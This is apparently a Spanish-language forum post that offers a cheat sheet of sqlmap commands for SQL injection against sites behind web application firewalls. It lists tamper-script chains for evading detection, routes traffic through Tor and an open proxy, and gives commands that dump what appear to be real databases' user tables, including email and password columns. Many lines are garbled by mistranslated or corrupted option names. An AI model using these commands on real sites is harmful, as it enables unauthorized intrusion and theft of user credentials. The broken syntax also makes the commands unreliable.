BYPASS WAF SQLMAP POR UFO OWO ?
Hola chicos, en esta oportunidad voy a hacer un pequeño post para hacer una evasión de WAF, que a veces son un poquito molestos. Dejaré una serie de comandos para hacer una inyección SQL y hacer un poquito de magia.
Disfrútenlo.

Si no has entendido algún comando, ponte a estudiar, vagos. -Lofiu

--level = 5 --risk = 3 --random-agent --user-agent -v3 --batch --threads = 10 --dbs



--dbms = "MySQL" -v3 --technique U --tamper = "space2mysqlblank.py" --dbs



--dbms = "MySQL" -v3 --technique U --tamper = "space2comment" --dbs



-v3 --technique = T --no-cast --fresh-queries --banner



sqlmap -u http: //www.********? id = 1 --level 2 --risk 3 --batch --dbs






 



-f -b - usuario actual --current-db --is-dba --users --dbs



 



--risk = 3 --level = 5 --random-agent --user-agent -v3 --batch --threads = 10 --dbs



 



--risk 3 --level 5 --random-agent --proxy http://123.57.48.140:8080 --dbs



 



--random-agent --dbms = MYSQL --dbs --technique = B "



 



--identificar-waf - agente-aleatorio -v 3 --dbs



 



1: --identify-waf --random-agent -v 3 --tamper = "between, randomcase, space2comment" --dbs



2: --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level = 5 --risk = 3



 



--threads = 10 --dbms = MYSQL --tamper = apostrophemask --technique = E -D joomlab -T anz91_session -C session_id --dump



 



--tables -D miss_db --is-dba --threads = "10" --time-sec = 10 --timeout = 5 --no-cast --tamper = entre, modsecurityverde, modsecurityzeroversioned, charencode, mayor - identificar-waf - agente-aleatorio



 



sqlmap.py -u http://192.168.0.107/test.php?id=1 -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"



 



--banner --safe-url = 2 --safe-freq = 3 --tamper = between, randomcase, charencode -v 3 --force-ssl --dbs --threads = 10 --level = 2 --risk = 2



-v3 --dbms = "MySQL" --risk = 3 --level = 3 --technique = BU --tamper = "space2mysqlblank.py" --random-agent -D damksa_abr -T admin, jobadmin, member - colu



 







 



--level = 5 --risk = 3 --random-agent --tamper = between, charencode, charunicodeencode, equaltolike, maximum, multiplespaces, no recursivereplacement, porcentaje, randomcase, securesphere, sp_password, space2comment, space2dash, space2mssqlblank, space2mysqashash , space2randomblank, unionalltounion, unmagicquotes --dbms = mssql



 



 



sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper = entre, bluecoat, charencode, charunicodeencode, concat2concatws, equaltolike, más grande, halfversionedmorekeywords, ifnull2ifisnull, modsecurityversioned, modsecurityzeroversioned, multiplespaces, nonrecursivereplacement, porcentaje, randomcase, securesphere, space2comment, space2hash, space2morehash, space2mysqldash, space2plus, space2randomblank, unionalltounion, unmagicquotes, versionedkeywords, versionedmorekeywords, xforwardedfor --dbms = mssql



 



sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper = between, charencode, charunicodeencode, equaltolike, maximum, multiplespaces, nonreursursereplacement, percent, randomcase, seguresphere, sp_password, space2comment, space2dash, space2mssqlblank, space2mysqldash, space2plus, space2randomblank, unionalltounion, unmagicquotes --dbms = mssql



 



 



sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper = apostrophemask, apostrophenullencode, base64encode, entre, chardoubleencode, charencode, charunicodeencecerequeech randomcase, securesphere, space2comment, space2plus, space2randomblank, unionalltounion, unmagicquotes --dbms = mssql



 



 



--level = 5 --risk = 3 -p "id" –-tamper = "apostrophemask, apostrophenullencode, appendnullbyte, base64encode, bluecoat, chardoubleencode, charcodeuccescontentaciones de las personas modsecurityzeroversioned, multiplespaces, nonrecursivereplacement, porcentajes, randomcase, randomcomments, securesphere, space2comment, space2hash, space2morehash, space2aspingsas_aspachas de la vida



 



sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1' –level = 5 –risk = 3 -p 'item1' –tamper = apostrophemask, apostrophenullencode, appendnullbyte, base64encode, entre, bluecoat, chardoubleencode, charencode, charunicodeencode, concat2concatws, equaltolike, más grande, halfversionedmorekeywords, ifnull2ifisnull, modsecurityversioned, modsecurityzeroversioned, multiplespaces, nonrecursivereplacement, porcentaje, randomcase, randomcomments, SecureSphere, space2comment, space2dash, space2hash, space2morehash, space2mssqlblank, space2mssqlhash, space2mysqlblank, space2mysqldash, space2plus, space2randomblank, sp_password, unionalltounion, unmagicquotes, versionedkeywords, versionedmorekeywords



 






--tamper "randomcase.py" --tor --tor-type = SOCKS5 --tor-port = 9050 --dbs --dbms "MySQL" --current-db --random-agent



 



--tamper "randomcase.py" --tor --tor-type = SOCKS5 --tor-port = 9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" - -mesas



 



--tamper "randomcase.py" --tor --tor-type = SOCKS5 --tor-port = 9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" - T "edt_usuarios" --columnas



 



--tamper "randomcase.py" --tor --tor-type = SOCKS5 --tor-port = 9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" - T "edt_usuarios" -C "ud, email, usuario, contra" --dump



 


tamper = between.py, charencode.py, charunicodeencode.py, equaltolike.py, greatest.py, multiplespaces.py, nonrecursivereplacement.py, percent.py, randomcase.py, securesphere.py, sp_password.py, space2comment.py, space2dash.py, space2mssqlblank.py, space2mysqldash.py, space2plus.py, space2randomblank.py, unionalltounion.py, unmagicquotes.py --dbms = mssql

